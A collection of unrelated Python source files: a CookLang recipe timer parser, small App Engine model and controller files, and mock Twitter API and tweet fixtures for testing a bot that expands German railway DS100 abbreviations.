```python
import re
from typing import List
from CookLangPy.unitconversion import largestUnitGreaterOne, unitConversion
timerReg = re.compile(r"~(.*){(\d+(?:\.\d+)?)%(hour|minute|second)s?}")
class Timer():
"""
A timer is a string of the form "~name{length%unit}".
length: the length of the timer in seconds.
name: the name of the timer (Optional).
"""
def __init__(self) -> None:
"""
Initialize the timer.
"""
self.length : int = 0
self.name : str = ""
def parse(input:str) -> List['Timer']:
timers = []
for match in timerReg.findall(input):
t = Timer()
t.length = unitConversion(match[2], "SECOND", float(match[1]))
t.name = match[0]
timers.append(t)
return timers
def __str__(self) -> str:
unit = largestUnitGreaterOne(["SECOND","MINUTE", "HOUR"], "SECOND", float(self.length))
val = unitConversion("SECOND", unit, float(self.length))
if val > 1.0:
unit += "S"
return "(Timer {0}: {1} {2}".format(self.name, val, unit.lower())
def fileOut(self) -> str:
unit = largestUnitGreaterOne(["SECOND","MINUTE", "HOUR"], "SECOND", float(self.length))
val = unitConversion("SECOND", unit, float(self.length))
if val > 1.0:
unit += "S"
return r"~" + self.name + r"{" + str(int(val)) + r"%" + unit.lower() + r"}"
``` |
{
"source": "jonaeroy/Hobby",
"score": 3
} |
#### File: app/models/phonebook.py
```python
from ferris.core.ndb import BasicModel
from ferris.behaviors.searchable import Searchable
from google.appengine.ext import ndb
class Phonebook(BasicModel):
Name = ndb.StringProperty(required=True)
Number = ndb.StringProperty(required=True)
class Meta:
behaviors = (Searchable,)
@classmethod
def create(cls, params):
item = cls()
item.populate(**params)
item.put()
return item
@classmethod
def list(cls):
return cls.query()
```
#### File: angular/controllers/angular.py
```python
from ferris import Controller, route_with
class Angular(Controller):
@route_with(template='/ng-view/<name:.*>')
def show(self, name):
self.meta.view.template_name = 'angular/' + name
``` |
{
"source": "jonaes/ds100bot",
"score": 2
} |
#### File: ds100bot/Mock/Api.py
```python
import tweepy # for exceptions
from Externals import Twitter
from Externals.Measure import Measure
from AnswerMachine.tweet import Tweet
import Persistence.log as log
from .Tweet import User, mocked_source, mocked_tweets
log_ = log.getLogger(__name__)
class Count: # pylint: disable=too-few-public-methods
def __init__(self):
self.correct = 0
self.missed = 0
self.bad_content = 0
class Result: # pylint: disable=too-few-public-methods
def __init__(self):
self.tweet = Count()
self.follow = Count()
class MockApi(Twitter): # pylint: disable=too-many-instance-attributes
def __init__(self, **kwargs):
log_.setLevel(log_.getEffectiveLevel() - 10)
self.running_id = 10001
self.myself = User.theBot
self.mode = kwargs.get('mode', 'testcases')
mocked_t = mocked_tweets()
if self.mode == 'external':
self.mock = mocked_source()
elif self.mode == 'testcases':
self.mock = mocked_t
elif self.mode == 'id':
self.mock = [t for t in mocked_t if t.id in kwargs.get('id_list', [])]
else:
raise ValueError("Invalid mode in {}: {}".format(__name__, self.mode))
self.replies = {}
self.double_replies = []
self.measure = Measure()
self.readonly = True
def get_tweet(self, tweet_id):
for t in self.mock:
if t.id == tweet_id:
return t
raise tweepy.TweepError("Kein solcher Tweet vorhanden")
def tweet_single(self, text, **kwargs):
super().tweet_single(text, **kwargs)
if 'in_reply_to_status_id' in kwargs:
reply_id = kwargs['in_reply_to_status_id']
# don't track thread answers:
if reply_id != self.running_id:
if reply_id in self.replies:
log_.warning("Tweet %d was replied to twice!", reply_id)
self.double_replies.append(reply_id)
else:
self.replies[reply_id] = text.strip()
self.running_id += 1
return self.running_id
def mentions(self, highest_id):
mention_list = []
for t in self.mock:
for um in t.raw['entities']['user_mentions']:
if um['screen_name'] == self.myself.screen_name:
mention_list.append(t)
break
return mention_list
def timeline(self, highest_id):
return [t for t in self.mock if t.author.follows]
def hashtag(self, tag, highest_id):
return [t for t in self.mock if Tweet(t).has_hashtag(tag)]
def is_followed(self, user):
return user.follows
def follow(self, user):
super().follow(user)
user.follows = True
def defollow(self, user):
super().defollow(user)
user.follows = False
def statistics(self, output='descriptive'):
stat_log = log.getLogger('statistics', '{message}')
res_count = Result()
stat_log.debug(" RESULTS")
for t in self.mock:
was_replied_to = t.id in self.replies
if t.expected_answer is None:
if was_replied_to:
stat_log.error("Tweet %d falsely answered", t.id)
res_count.tweet.missed += 1
else:
res_count.tweet.correct += 1
stat_log.info("Tweet %d correctly unanswered", t.id)
continue
# expected answer is not None:
if not was_replied_to:
res_count.tweet.missed += 1
stat_log.error("Tweet %d falsely unanswered", t.id)
continue
# correctly answered: is it the correct answer?
if t.expected_answer == self.replies[t.id]:
res_count.tweet.correct += 1
stat_log.info("Tweet %d correctly answered with correct answer", t.id)
continue
res_count.tweet.bad_content += 1
stat_log.error("Tweet %d correctly answered, but with wrong answer", t.id)
stat_log.warning(t.expected_answer)
stat_log.warning("↑↑↑↑EXPECTED↑↑↑↑ ↓↓↓↓GOT THIS↓↓↓↓")
stat_log.warning(self.replies[t.id])
for l in User.followers, User.nonfollowers:
for u in l:
if u.follows == u.follow_after:
stat_log.info("User @%s has correct following behaviour %s",
u.screen_name, u.follows)
res_count.follow.correct += 1
else:
stat_log.error("User @%s doesn't follow correctly (should %s, does %s)",
u.screen_name, u.follow_after, u.follows)
res_count.follow.missed += 1
self.report_statisctics(stat_log, output, res_count)
return res_count.tweet.missed + res_count.tweet.bad_content + res_count.follow.missed
def report_statisctics(self, stat_log, output, res_count): # pylint: disable=R0201
denominator = (res_count.tweet.correct + res_count.tweet.missed +
res_count.tweet.bad_content + res_count.follow.correct +
res_count.follow.missed)
if denominator == 0:
stat_log.log(51, "No testcases found")
elif output == 'descriptive':
stat_log.log(51, "ALL GOOD: %2d", res_count.tweet.correct)
stat_log.log(51, "INCORRECT TEXT: %2d", res_count.tweet.bad_content)
stat_log.log(51, "WRONG ANSWER/NOT ANSWER:%2d", res_count.tweet.missed)
stat_log.log(51, "CORRECT FOLLOWING: %2d", res_count.follow.correct)
stat_log.log(51, "WRONG FOLLOWING: %2d", res_count.follow.missed)
elif output == 'summary':
ratio = (res_count.tweet.correct + res_count.follow.correct) / (0.0 + denominator)
stat_log.log(51, "A %d/%d F %d/%d R %.1f%%",
res_count.tweet.correct,
res_count.tweet.bad_content + res_count.tweet.missed,
res_count.follow.correct, res_count.follow.missed,
100.0 * ratio)
```
#### File: ds100bot/Mock/Tweet.py
```python
import copy
import re
import Persistence.log as log
log_ = log.getLogger(__name__)
class User:
# pylint: disable=R0903
def __init__(self, **kwargs):
self.screen_name = kwargs['screen_name']
self.id = kwargs['id']
self._mention = {
'screen_name': self.screen_name,
'name': kwargs['name'],
'id': self.id,
'indices': [0, 0]
}
self.follows = kwargs.get('follows', False)
self.follow_after = self.follows
def mention(self, start):
result = copy.deepcopy(self._mention)
result['indices'][0] = start
result['indices'][1] = start + len(self.screen_name)
return result
User.theBot = User(
id=1065715403622617089,
id_str='1065715403622617089',
name='DS100-Bot',
screen_name='_ds_100',
location='',
description='''Expandiert DS100-Abkürzungen. #DS100 und #$KURZ verwenden, oder den Bot
taggen. #folgenbitte und der Bot findet #$KURZ ohne Aufforderung. Siehe Webseite.''',
url='https://t.co/s7A9JO049r',
entities={
'url': {
'urls': [{
'url': 'https://t.co/s7A9JO049r',
'expanded_url': 'https://ds100.frankfurtium.de/',
'display_url': 'ds100.frankfurtium.de',
'indices': [0, 23]
}]
},
'description': {'urls': []}
},
protected=False,
followers_count=61,
friends_count=29,
listed_count=0,
favourites_count=0,
utc_offset=None,
time_zone=None,
geo_enabled=False,
verified=False,
statuses_count=250,
lang=None,
contributors_enabled=False,
is_translator=False,
is_translation_enabled=False,
profile_background_color='F5F8FA',
profile_background_image_url=None,
profile_background_image_url_https=None,
profile_background_tile=False,
profile_image_url=
'http://pbs.twimg.com/profile_images/1140888262619385856/dODzmIW9_normal.png',
profile_image_url_https=
'https://pbs.twimg.com/profile_images/1140888262619385856/dODzmIW9_normal.png',
profile_link_color='1DA1F2',
profile_sidebar_border_color='C0DEED',
profile_sidebar_fill_color='DDEEF6',
profile_text_color='333333',
profile_use_background_image=True,
has_extended_profile=False,
default_profile=True,
default_profile_image=False,
following=False,
follow_request_sent=False,
notifications=False,
translator_type='none',
follows=True)
User.followed = User(id=11, id_str='11',
name='Followee account',
screen_name='followee',
description='Fake: This user is followed by the bot.',
follows=True)
User.notfollowed = User(id=12, id_str='12',
name='Some other Account',
screen_name='someotheraccount',
description='Fake: This user is not followed by the bot.',
follows=False)
User.followers = []
for i in range(21, 26):
User.followers.append(User(id=i, name='Follower', screen_name='follower{}'.format(i),
follows=True))
User.nonfollowers = []
for i in range(31, 37):
User.nonfollowers.append(User(id=i, name='Nonfollower', screen_name='otherone{}'.format(i),
follows=False))
class TweepyMock:
# pylint: disable=R0902
def __init__(self, **kwargs):
self.raw = kwargs
self.add_to_raw('expected_answer', None)
self.add_to_raw('display_text_range', [0, len(self.raw['full_text'])])
self.add_to_raw('in_reply_to_status_id', None)
self.add_to_raw('in_reply_to_user_id', None)
self.add_to_raw('in_reply_to_screen_name', None)
self.id = self.raw['id']
self.full_text = self.raw['full_text']
self.create_entities()
self.author = self.raw['user']
self.display_text_range = self.raw['display_text_range']
if 'quoted_status_id' in self.raw:
self.quoted_status_id = self.raw['quoted_status_id']
else:
self.quoted_status_id = None
self.in_reply_to_status_id = self.raw['in_reply_to_status_id']
self.expected_answer = self.raw.get('expected_answer', None)
self.retweeted_status = self.raw.get('retweeted_status', False)
if 'extended_entities' in self.raw:
self.extended_entities = self.raw['extended_entities']
def add_to_raw(self, key, val):
if key not in self.raw:
self.raw[key] = val
def create_entities(self):
self.add_to_raw('entities', {})
if 'hashtags' not in self.raw['entities']:
# create your own hashtag list
ht = re.compile(r"""\#(\w+)""")
self.raw['entities']['hashtags'] = []
for t in ht.finditer(self.full_text):
self.raw['entities']['hashtags'].append({
'text': t.group(1),
'indices': [t.start(1), t.end(1)]
})
if 'user_mentions' not in self.raw['entities']:
self.raw['entities']['user_mentions'] = []
self.entities = self.raw['entities']
def __str__(self):
lines = self.full_text.splitlines()
length = max([len(l) for l in lines])
length = max(length, len(self.author.screen_name) + 2)
result = "┏{}┓\n".format('━'*(length+2))
result += ("┃ @{{:{}}} ┃\n".format(length - 1)).format(self.author.screen_name + ":")
for l in lines:
result += ("┃ {{:{}}} ┃\n".format(length)).format(l)
result += "┗{}┛".format('━'*(length+2))
return result
def mocked_tweets():
# pylint: disable=C0301, R0915
# signatures bot*:
# tl/nl: in timeline / not in timeline
# ab/ns/xs/na: abbreviation present (#FF, $123) / no sigil (FF) / explicit source (#DS:FF) / no abbreviation present
# xm/im: explicit mention / implicit mention (@ outside display_text_range)
# mt/md/me: magic tag / default magic tag / else magic tag
# pr/rt/re: pure retweet / retweet=quote / reply
# fs/fe #folgenbitte / #entfolgen
list_of_tweets = []
list_of_tweets.append(TweepyMock(
full_text='This tweet should never been seen nor processed by the Bot. bot%nl%na%101',
expected_answer=None,
id=101,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet should appear in the Bot’s timeline, but should be ignored. bot%tl%na%102',
id=102,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet explicitly mentions @_ds_100, but no other tweet. bot%tl%xm%na%103',
id=103,
entities={'user_mentions': [User.theBot.mention(31)]},
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet explicitly mentions @_ds_100, but no other tweet. bot%nl%xm%na%104',
id=104,
entities={'user_mentions': [User.theBot.mention(31)]},
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet includes magic hashtag #DS100, but no other tweet. bot%tl%md%na%105',
id=105,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet includes magic hashtag #DB640, but no other tweet. bot%nl%mt%na%106',
id=106,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet is ignored because of #NOBOT #FF bot%tl%me%301',
id=107,
user=User.followed,
))
list_of_tweets.append(TweepyMock(
full_text='This tweet my own #FF bot%...%108',
id=108,
user=User.theBot
))
list_of_tweets.append(TweepyMock(
full_text='This tweet pure retweet #FF bot%tl%ab%pr%109',
id=109,
retweeted_status=True,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='#entfolgen bot%tl%fe%151',
id=151,
user=User.followers[0]
))
list_of_tweets.append(TweepyMock(
full_text='#entfolgen bot%nl%fe%152',
id=152,
user=User.followers[1]
))
list_of_tweets.append(TweepyMock(
full_text='#entfolgen @_ds_100 bot%xm%fe%153',
id=153,
entities={'user_mentions': [User.theBot.mention(12)]},
user=User.followers[2]
))
User.followers[2].follow_after = False
list_of_tweets.append(TweepyMock(
full_text='@_ds_100 #entfolgen bot%im%fe%154',
id=154,
display_text_range=[10, 52],
entities={'user_mentions': [User.theBot.mention(0)]},
user=User.followers[3]
))
list_of_tweets.append(TweepyMock(
full_text='#DS100 #entfolgen bot%mt%fe%155',
id=155,
user=User.followers[4]
))
list_of_tweets.append(TweepyMock(
full_text='#folgenbitte bot%tl%fs%161',
id=161,
user=User.nonfollowers[0]
))
list_of_tweets.append(TweepyMock(
full_text='#folgenbitte bot%nl%fs%162',
id=162,
user=User.nonfollowers[1]
))
list_of_tweets.append(TweepyMock(
full_text='#folgenbitte @_ds_100 bot%xm%fs%163',
id=163,
entities={'user_mentions': [User.theBot.mention(12)]},
user=User.nonfollowers[2]
))
User.nonfollowers[2].follow_after = True
list_of_tweets.append(TweepyMock(
full_text='@_ds_100 #folgenbitte bot%im%fs%164',
id=164,
display_text_range=[10, 62],
entities={'user_mentions': [User.theBot.mention(0)]},
user=User.nonfollowers[3]
))
list_of_tweets.append(TweepyMock(
full_text='#DS100 #folgenbitte bot%mt%fs%165',
id=165,
entities={'user_mentions': []},
user=User.nonfollowers[4]
))
list_of_tweets.append(TweepyMock(
full_text='@_ds_100 This tweet xm @_ds_100 in a reply #folgenbitte bot%nl%xm%im%fs%issue[9]%204',
display_text_range=[9, 75],
id=166,
entities={'user_mentions': [
User.theBot.mention(0),
User.theBot.mention(23)
]},
user=User.nonfollowers[5]
))
User.nonfollowers[5].follow_after = True
list_of_tweets.append(TweepyMock(
full_text='This tweet is quoted with explicit mention. bot%ns%nl%201 FF FK FM FW',
expected_answer='FF: Frankfurt (Main) Hbf\nFK: Kassel Hbf\nFW: Wiesbaden Hbf',
id=201,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet explicitly mentions @_ds_100 and quotes tweet bot%xm%rt[201]%221: https://t.co/f4k3url_12',
expected_answer=None,
id=221,
entities={'user_mentions': [User.theBot.mention(31)]},
user=User.notfollowed,
quoted_status_id=201
))
list_of_tweets.append(TweepyMock(
full_text='This tweet is replied-to with explicit mention. bot%nl%ns%202 FF FK FM FW',
expected_answer='FF: Frankfurt (Main) Hbf\nFK: Kassel Hbf\nFW: Wiesbaden Hbf',
id=202,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='@followee @_ds_100 This tweet: bot%xm%re[202]%222',
id=222,
entities={'user_mentions': [User.notfollowed.mention(0), User.theBot.mention(11)]},
in_reply_to_status_id=202,
in_reply_to_user_id=User.notfollowed.id,
in_reply_to_screen_name=User.notfollowed.screen_name,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet is replied to with magic hashtag _FFM. bot%nl%ns%203 #FW',
expected_answer='FFM#FW: <NAME>',
id=203,
user=User.notfollowed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet replies with magic hashtag #_FFM. bot%nl%me%re[203]%223',
id=223,
user=User.notfollowed,
in_reply_to_status_id=203,
in_reply_to_user_id=User.notfollowed.id,
in_reply_to_screen_name=User.notfollowed.screen_name
))
list_of_tweets.append(TweepyMock(
full_text='This tweet my own will be quoted #FF bot%tl%ab%204',
id=204,
user=User.theBot
))
list_of_tweets.append(TweepyMock(
full_text='This tweet quotes myself, @_ds_100! bot%tl%ab%pr%re[204]%224',
id=224,
entities={'user_mentions': [User.theBot.mention(26)]},
user=User.followed,
in_reply_to_status_id=204,
in_reply_to_screen_name=User.theBot.screen_name
))
list_of_tweets.append(TweepyMock(
full_text='Hallo @_ds_100, do you know $1733? bot%tl%xm%ab[1,$]%issue[8]%301',
expected_answer='1733: Hannover --Kassel-- - Würzburg',
id=301,
entities={'user_mentions': [User.theBot.mention(6)]},
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet plain tags #FF #_FH #DS:FFU #DS:_FKW #DS:HG_ bot%tl%ab%ns%401',
expected_answer='FF: Frankfurt (Main) Hbf\nFFU: Fulda\nHG: Göttingen',
id=401,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet different cases #DS:FF #DS:Fkw #ÖBB:Aa #ÖBB:AB bot%tl%xs%402',
expected_answer='FF: Frankfurt (Main) Hbf\nÖBB#Aa: W․Mat․-Altmannsdorf (in Wbf)',
id=402,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet blacklist #DBL #DS:WLAN bot%tl%bl%403',
expected_answer='WLAN: Langen',
id=403,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet mixes sources #MS #_FFM #WBC #_NO #OSL #DS:FF #BRG #DS100 #FKW bot%tl%ab%xs%is%mt%me%404',
expected_answer='FFM#MS: Festhalle/Messe\nFFM#WBC: Willy-Brandt-Platz (C-Ebene)\nNO#OSL: Oslo S\nFF: Frankfurt (Main) Hbf\nNO#BRG: Bergen\nFKW: Kassel-Wilhelmshöhe',
id=404,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet do not find CH = Chur #_CH #BS bot%tl%ab%mt%issue[13]%411',
expected_answer='CH#BS: Basel SBB',
id=411,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet make sure 411 works: #CH:CH bot%tl%xs%issue[13]%412',
expected_answer='CH#CH: Chur',
id=412,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅰ: #NO:249 #NO:ÅBY bot%tl%xs%unusual%420',
expected_answer='NO#249: H-sign 249\nNO#ÅBY: Åneby',
id=420,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅱ: $DS:VDE8¹ #CH:600133 #CH:ALT94 bot%tl%xs%unusual%421',
expected_answer='VDE8¹: Nürnberg-Erfurt\nCH#600133: UNO Linie 600, km 133.179\nCH#ALT94: Altstätten SG 94',
id=421,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅲ: #AT:Aa_G #AT:Aa_Z9 #AT:Z bot%tl%xs%unusual%422',
expected_answer='AT#Aa G: Grenze ÖBB-WLB im km 7,610\nAT#Aa Z9: Wr․ Neudorf\nAT#Z: Zell am See',
id=422,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅳ: #DS:AA_G #DS:AAG #DS:EM302 bot%tl%xs%unusual%423',
expected_answer='AA G: Hamburg-Altona Gbf\nAAG: Ascheberg (Holst)\nEM302: Oberhausen Sbk M302',
id=423,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅴ: #BOT:SARS_COV_2 #BOT:REKURSION #BOT:toggle bot%tl%xs%unusual%424',
expected_answer='SARS COV 2: Dieser Bot ist offiziell Virusfrei™ und immun. Kuscheln, Händchenhalten etc. ist erlaubt. Bitte nicht anniesen (weil ist eklig). Lasst euch impfen, sobald ihr die Gelegenheit bekommt!\nREKURSION: Siehe bitte #REKURSION',
id=424,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅵ: #HH:HX #LP:K;#LP:KA+#LP:KALD bot%tl%xs%unusual%425',
expected_answer='HH#HX: Hauptbahnhof-Nord\nLP#K: Köln Hbf\nLP#KA: Karlsruhe Hbf\nLP#KALD: Kaldenkirchen',
id=425,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅶ: #UK:ABE #UK:ABER #NL:Ah;#NL:Ahg/#NL:Apn #NL:APD bot%tl%xs%unusual%426',
expected_answer='UK#ABE: Aber\nUK#ABER: Aber\nNL#Ah: Arnhem\nNL#Ahg: Arnhem Goederenstation\nNL#Apn: <NAME>',
id=426,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅷ: #FR:A?#FR:AA!#FR:AAA bot%tl%xs%unusual%427',
expected_answer='FR#A: Angouleme\nFR#AA: Aire sur l\'Adour\nFR#AAA: Allassac',
id=427,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅸ: $3640 #FFM:HB #FFM:_HB #FFM:211 #W:J $FFM:A3 bot%tl%xs%unusual%428',
expected_answer='3640: Frankfurt-Höchst - Bad Soden\nFFM#HB: Frankfurt Hauptbahnhof\nFFM#_HB: WA Hauptbahnhof\nFFM#211: Hauptbahnhof\nW#J: Jedlersdorf (in F)\nFFM$A3: Anschlussstrecke A3: Abzweig Nordwest - Ober<NAME>',
id=428,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅹ: $FFM:A $FFM:Aⅰ $FFM:AⅡ $FFM:AIII bot%tl%xs%unusual%429',
expected_answer='FFM$A: A-Strecke: Südbahnhof - Heddernheim - (Ginnheim/Bad Homburg/Oberursel)\nFFM$Aⅰ: A-Strecke Teilabschnitt 1 Humser Straße - Hauptwache\nFFM$AⅡ: A-Strecke Teilabschnitt 2 Hauptwache - Willy-Brandt-Platz\nFFM$AIII: A-Strecke Teilabschnitt 3 Humser Straße - Weißer Stein',
id=429,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅰ: #_NO #249 #ÅBY bot%tl%mt%unusual%430',
expected_answer='NO#249: H-sign 249\nNO#ÅBY: Åneby',
id=430,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅱ: #DS100 $VDE8¹ #_CH #600133 #ALT94 bot%tl%mt%unusual%431',
expected_answer='VDE8¹: Nürnberg-Erfurt\nCH#600133: UNO Linie 600, km 133.179\nCH#ALT94: Altstätten SG 94',
id=431,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅲ: #_AT #Aa_G #Aa_Z9 #_AT #Z bot%tl%mt%unusual%432',
expected_answer='AT#Aa G: Grenze ÖBB-WLB im km 7,610\nAT#Aa Z9: Wr․ Neudorf\nAT#Z: Zell am See',
id=432,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅳ: #_DS #AA_G #AAG #EM302 bot%tl%mt%unusual%433',
expected_answer='AA G: Hamburg-Altona Gbf\nAAG: Ascheberg (Holst)\nEM302: Oberhausen Sbk M302',
id=433,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅴ: #DS100 #SARS_COV_2 #REKURSION #toggle bot%tl%mt%unusual%434',
expected_answer='SARS COV 2: Dieser Bot ist offiziell Virusfrei™ und immun. Kuscheln, Händchenhalten etc. ist erlaubt. Bitte nicht anniesen (weil ist eklig). Lasst euch impfen, sobald ihr die Gelegenheit bekommt!\nREKURSION: Siehe bitte #REKURSION',
id=434,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅵ: #_HH #HX #_LP #K;#KA+#KALD bot%tl%mt%unusual%435',
expected_answer='HH#HX: Hauptbahnhof-Nord\nLP#K: Köln Hbf\nLP#KA: Karlsruhe Hbf\nLP#KALD: Kaldenkirchen',
id=435,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅶ: #_UK #ABE #ABER #_NL #Ah;#Ahg/#Apn #APD bot%tl%mt%unusual%436',
expected_answer='GB#ABE: Aber\nGB#ABER: Aber\nNL#Ah: Arnhem\nNL#Ahg: Arnhem Goederenstation\nNL#Apn: <NAME>',
id=436,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅷ: #_FR #A?#AA!#AAA bot%tl%mt%unusual%437',
expected_answer='FR#A: Angouleme\nFR#AA: Aire sur l\'Adour\nFR#AAA: Allassac',
id=437,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅸ: #_DE $3640 #_FFM #HB #FFM:_HB #211 #_W #J #_FFM $A3 bot%tl%mt%unusual%438',
expected_answer='3640: Frankfurt-Höchst - Bad Soden\nFFM#HB: Frankfurt Hauptbahnhof\nFFM#_HB: WA Hauptbahnhof\nFFM#211: Hauptbahnhof\nW#J: Jedlersdorf (in F)\nFFM$A3: Anschlussstrecke A3: Abzweig Nordwest - Oberursel Hohemark',
id=438,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅹ: #_FFM $A $Aⅰ $AⅡ $AIII bot%tl%mt%unusual%439',
expected_answer='FFM$A: A-Strecke: Südbahnhof - Heddernheim - (Ginnheim/Bad Homburg/Oberursel)\nFFM$Aⅰ: A-Strecke Teilabschnitt 1 Humser Straße - Hauptwache\nFFM$AⅡ: A-Strecke Teilabschnitt 2 Hauptwache - Willy-Brandt-Platz\nFFM$AIII: A-Strecke Teilabschnitt 3 Humser Straße - Weißer Stein',
id=439,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet media: #_FFM #HB #DS100 bot%tl%mt%mf%440',
expected_answer='FFM#HB: Frankfurt Hauptbahnhof\nRALP: Alpirsbach\nCH#HE: Herisau\nCH#MS: Münsingen',
extended_entities={'media': [{'ext_alt_text': '#RALP'},
{'ext_alt_text': '#_CH #HE'},
{'ext_alt_text': '#MS'}
]},
id=440,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet media w/o ext_alt: #_FFM #HB bot%tl%mt%mf%441',
expected_answer='FFM#HB: Frankfurt Hauptbahnhof',
extended_entities={'media': [{},
{}
]},
id=441,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet media w/o media: #_FFM #HB bot%tl%mt%mf%442',
expected_answer='FFM#HB: Frankfurt Hauptbahnhof',
extended_entities={},
id=442,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet #FF $1234 %Hp0 &Awanst /FFM:U2 bot%tl%sigil%450',
expected_answer='FF: Frankfurt (Main) Hbf\n1234: HH-Eidelstedt - Rothenburgsort\nHp0: Halt.\nAwanst: Ausweichanschlussstelle\nFFM/U2: Bad Homburg Gonzenheim - Nieder-Eschbach - Riedwiese - Heddernheim - Südbahnhof',
id=450,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Blacklist #LZB &LZB bot%tl%bl%451',
expected_answer='LZB: Linienförmige Zugbeeinflussung',
id=451,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Repeated things #FF #FF bot%tl%460',
expected_answer='FF: Frankfurt (Main) Hbf',
id=460,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Repeated things #_FFM #DS:FF #DS100 #DE:FF #FF bot%tl%461',
expected_answer='FF: Frankfurt (Main) Hbf',
id=461,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Bot precedence #AI #_CH #BOT:AI bot%tl%462',
expected_answer='CH#AI: Airolo\nAI: Dieser Bot besitzt keine Künstliche Intelligenz. Er ist sozusagen strunzdumm. Lernen kann der Bot nur, indem der Autor lernt und etwas neues dazuprogrammiert.',
id=462,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Bot precedence #CH:AI #AI bot%tl%463',
expected_answer='CH#AI: Airolo\nAI: Dieser Bot besitzt keine Künstliche Intelligenz. Er ist sozusagen strunzdumm. Lernen kann der Bot nur, indem der Autor lernt und etwas neues dazuprogrammiert.',
id=463,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Bot flag emoji \U0001F1E6\U0001F1F9 #FAQ:AUSLAND bot%tl%501',
expected_answer=('FAQ#AUSLAND: Kürzel mit X und Z haben als zweiten Buchstaben das Land: '
+ 'XA\U0001F1E6\U0001F1F9 '
+ 'XB\U0001F1E7\U0001F1EA '
+ 'XC\U0001f1f7\U0001f1fa '
+ 'XD\U0001f1e9\U0001f1f0 '
+ 'XE\U0001f1ea\U0001f1f8 '
+ 'XF\U0001f1eb\U0001f1f7 '
+ 'XG\U0001f1ec\U0001f1f7 '
+ 'XH\U0001f1eb\U0001f1ee '
+ 'XI\U0001f1ee\U0001f1f9 '
+ 'XJ\U0001f1f7\U0001f1f8 '
+ 'XK\U0001f1ec\U0001f1e7 '
+ 'XL\U0001f1f1\U0001f1fa '
+ 'XM\U0001f1ed\U0001f1fa '
+ 'XN\U0001f1f3\U0001f1f1 '
+ 'XO\U0001f1f3\U0001f1f4 '
+ 'XP\U0001f1f5\U0001f1f1 '
+ 'XQ\U0001f1f9\U0001f1f7 '
+ 'XR\U0001f1ed\U0001f1f7 '
+ 'XS\U0001f1e8\U0001f1ed '
+ 'XT\U0001f1e8\U0001f1ff '
+ 'XU\U0001f1f7\U0001f1f4 '
+ 'XV\U0001f1f8\U0001f1ea '
+ 'XW\U0001f1e7\U0001f1ec '
+ 'XX\U0001f1f5\U0001f1f9 '
+ 'XY\U0001f1f8\U0001f1f0 '
+ 'XZ\U0001f1f8\U0001f1ee '
+ 'ZA\U0001f1f2\U0001f1f0 '
+ 'ZB\U0001f1e7\U0001f1e6 '
+ 'ZE\U0001f1ea\U0001f1ea '
+ 'ZI\U0001f1ee\U0001f1ea '
+ 'ZK\U0001f1f0\U0001f1ff '
+ 'ZL\U0001f1f1\U0001f1f9 '
+ 'ZM\U0001f1f2\U0001f1e9 '
+ 'ZT\U0001f1f1\U0001f1fb '
+ 'ZU\U0001f1fa\U0001f1e6 '
+ 'ZW\U0001f1e7\U0001f1fe'
),
id=501,
user=User.followed
))
return list_of_tweets
def mocked_source():
try:
